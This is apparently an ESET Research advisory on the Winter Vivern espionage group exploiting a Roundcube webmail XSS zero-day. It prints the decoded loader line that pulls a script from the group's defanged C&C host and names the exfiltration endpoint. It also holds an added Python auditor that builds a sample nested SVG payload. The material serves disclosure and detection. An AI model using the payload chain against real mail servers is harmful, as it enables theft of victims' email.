Winter Vivern exploits a zero-day vulnerability in Roundcube Webmail servers

ESET Research

ESET Research recommends updating Roundcube Webmail to the latest available version as soon as possible


ESET Research has been closely tracking the cyberespionage operations of Winter Vivern for more than a year and, during our routine monitoring, we found that the group started to exploit a zero-day XSS vulnerability in Roundcube Webmail servers on October 11th, 2023. This is a different vulnerability than CVE-2020-35730, which is also exploited by the group according to our research.

According to ESET telemetry data, the campaign targeted Roundcube Webmail servers belonging to government entities and a think tank, all in Europe.

Timeline of vulnerability disclosure:

  • 2023-10-12: ESET Research reports the vulnerability to the Roundcube team.
  • 2023-10-14: The Roundcube team responded and acknowledged the vulnerability.
  • 2023-10-14: The Roundcube team patched the vulnerability.
  • 2023-10-16: The Roundcube team released security updates addressing the vulnerability (1.6.4, 1.5.5, and 1.4.15).
  • 2023-10-18: ESET CNA issued a CVE for the vulnerability (CVE-2023-5631).
  • 2023-10-25: ESET Research blogpost published.

We would like to thank the developers of Roundcube for their quick response and for patching the vulnerability in such a short time.

Winter Vivern profile

Winter Vivern is a cyberespionage group that was first revealed by DomainTools in 2021. It is believed to have been active since at least 2020 and it targets governments in Europe and Central Asia. To compromise its targets, the group uses malicious documents, phishing websites, and a custom PowerShell backdoor (see the articles from the State Cyber Protection Centre of Ukraine and from SentinelLabs). We believe with low confidence that Winter Vivern is linked to MoustachedBouncer, a sophisticated Belarus-aligned group that we first documented in August 2023.

Winter Vivern has been targeting Zimbra and Roundcube email servers belonging to government entities since 2022; see this article from Proofpoint. In particular, we observed that the group was exploiting CVE-2020-35730, another XSS vulnerability in Roundcube, in August and September 2023. Note that Sednit (also known as APT28) also exploits this old XSS vulnerability in Roundcube, sometimes against the same targets.

Technical details

Exploitation of the XSS vulnerability, assigned CVE-2023-5631, can be done remotely by sending a specially crafted email message. In this Winter Vivern campaign, the emails are sent from team.management@outlook(.)com and have the subject "Start your Outlook", as shown in Figure 1.

Figure 1. Malicious email message

At first glance, the email doesn't seem malicious, but if we examine the HTML source code, shown in Figure 2, we see an SVG tag at the end, with a base64-encoded payload.

Figure 2. Email message with malicious SVG tag

Once we decode the base64-encoded value of the href attribute of the use tag, we have:

'))" />

As the value x given to the href attribute is not a valid URL, the onerror attribute of this object will be triggered. Decoding the payload of the onerror attribute gives us the following JavaScript code (with the malicious URL manually defanged), which will be executed by the victim's browser in the context of their Roundcube session:

// Injects a remote script element into the page: this is how the second stage is loaded.
var fe=document.createElement('script');fe.src="https://recsecas(.)com/controlserver/checkupdate.js";document.body.appendChild(fe);

Surprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance. It turned out to be a zero-day XSS vulnerability affecting the server-side script rcube_washtml.php, which does not properly sanitize a malicious SVG document before adding it to the HTML page rendered to the Roundcube user. We reported it to Roundcube and it was patched on October 14th, 2023 (see this commit). The vulnerability affects Roundcube versions 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15.

In summary, by sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user’s browser window. No manual interaction other than viewing the message in a web browser is required.
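The injection chain described above (an SVG use tag whose href carries a base64 SVG, which in turn carries an element with a bogus href and an onerror handler that evals a base64 script) can be audited for on the mail-gateway side. The following is an added example, not code from ESET or the Roundcube project; it uses a constructed email body with a placeholder domain and walks the chain recursively, reporting each layer it finds.

```python
import base64
import re
from html.parser import HTMLParser

EVENT_ATTR = re.compile(r"^on[a-z]+$")                       # onerror, onload, ...
SVG_DATA_URI = re.compile(r"^data:image/svg\+xml;base64,(?P<b64>[A-Za-z0-9+/=\s]+)$", re.I)
ATOB_CALL = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def audit_html(html, depth=0):
    """Return a list of (depth, message) for SVG-borne script vectors.

    depth 0 is the email body itself; each base64-embedded SVG adds one level."""
    findings = []

    class Auditor(HTMLParser):
        def handle_starttag(self, tag, attrs):   # also called for self-closing tags
            for name, value in attrs:
                value = value or ""
                if EVENT_ATTR.match(name):
                    findings.append((depth, f"<{tag}> carries event handler {name}"))
                    # Unwrap eval(atob('...')) so the analyst sees the real script.
                    for b64 in ATOB_CALL.findall(value):
                        js = base64.b64decode(b64).decode("utf-8", "replace")
                        findings.append((depth, f"decoded atob payload: {js}"))
                m = SVG_DATA_URI.match(value) if name in ("href", "xlink:href") else None
                if m:
                    inner = base64.b64decode(m.group("b64")).decode("utf-8", "replace")
                    findings.append((depth, f"<{tag}> {name} embeds a base64 SVG document"))
                    findings.extend(audit_html(inner, depth + 1))   # recurse into it

    Auditor().feed(html)
    return findings

def is_suspicious(html):
    return len(audit_html(html)) > 0

# Constructed sample mirroring the chain; the loader URL is a placeholder, not an IoC.
_INNER_JS = ("var fe=document.createElement('script');"
             "fe.src='https://placeholder.invalid/checkupdate.js';document.body.appendChild(fe);")
_INNER_SVG = ('<svg xmlns="http://www.w3.org/2000/svg"><image href="x" onerror="eval(atob(\'%s\'))" /></svg>'
              % base64.b64encode(_INNER_JS.encode()).decode())
SAMPLE_EMAIL_HTML = ('<html><body><p>Start your Outlook</p><svg><use href="data:image/svg+xml;base64,%s" />'
                     '</svg></body></html>' % base64.b64encode(_INNER_SVG.encode()).decode())
BENIGN_EMAIL_HTML = '<html><body><svg><circle r="5" /></svg><p>hello</p></body></html>'

if __name__ == "__main__":
    for d, msg in audit_html(SAMPLE_EMAIL_HTML):
        print("  " * d + msg)
```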

The second stage is a simple JavaScript loader named checkupdate.js and shown in Figure 3.

Figure 3. JavaScript loader

The final JavaScript payload, shown in Figure 4, is able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C&C server by making HTTP requests to https://recsecas(.)com/controlserver/saveMessage.

Figure 4. Final JavaScript payload that exfiltrates email messages from a Roundcube account (part of the obfuscated script removed for clarity)

Conclusion

Winter Vivern enhanced its operations by exploiting a zero-day vulnerability in Roundcube. Previously, it exploited known vulnerabilities in Roundcube and Zimbra, where proofs of concept were available online.

Despite the low sophistication of the group's toolset, it is a threat to European governments because of its persistence, because it runs phishing campaigns very regularly, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities.

For any questions about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.
ESET Research offers private APT intelligence reports and data feeds. For any questions about this service, visit the ESET Threat Intelligence page.

IoCs

Files

SHA-1                                     File name       Detection          Description
97ED594EF2B5755F0549C6C5758377C0B87CFAE0  checkupdate.js  JS/WinterVivern.B  JavaScript loader.
8BF7FCC70F6CE032217D9210EF30314DDD6B8135  N/A             JS/Kryptik.BIK     JavaScript payload exfiltrating emails from Roundcube.

Network

IP              Domain          Hosting provider  First seen  Details
38.180.76(.)31  recsecas(.)com  M247 Europe SRL   2023-09-28  Winter Vivern C&C server

Email addresses

team.management@outlook(.)com

This table was built using version 13 of the MITRE ATT&CK framework.

Tactic                ID         Name                                       Description
Resource Development  T1583.001  Acquire Infrastructure: Domains            Winter Vivern operators bought a domain from Registrar.eu.
                      T1583.004  Acquire Infrastructure: Server             Winter Vivern operators rented a server at M247.
                      T1587.004  Develop Capabilities: Exploits             Winter Vivern operators must have developed an exploit for Roundcube.
Initial Access        T1190      Exploit Public-Facing Application          Winter Vivern sent an email exploiting CVE-2023-5631 in Roundcube.
                      T1566      Phishing                                   The vulnerability is triggered by a phishing email, which must be opened in the victim's Roundcube webmail.
Execution             T1203      Exploitation for Client Execution          The JavaScript payload is executed via an XSS vulnerability in Roundcube.
Discovery             T1087.003  Account Discovery: Email Account           The JavaScript payload can list email account folders.
Collection            T1114.002  Email Collection: Remote Email Collection  The JavaScript payload can exfiltrate emails from a Roundcube account.
Command and Control   T1071.001  Application Layer Protocol: Web Protocols  C&C communications use HTTPS.
Exfiltration          T1041      Exfiltration Over C2 Channel               Exfiltration is done via HTTPS to the same C&C server.
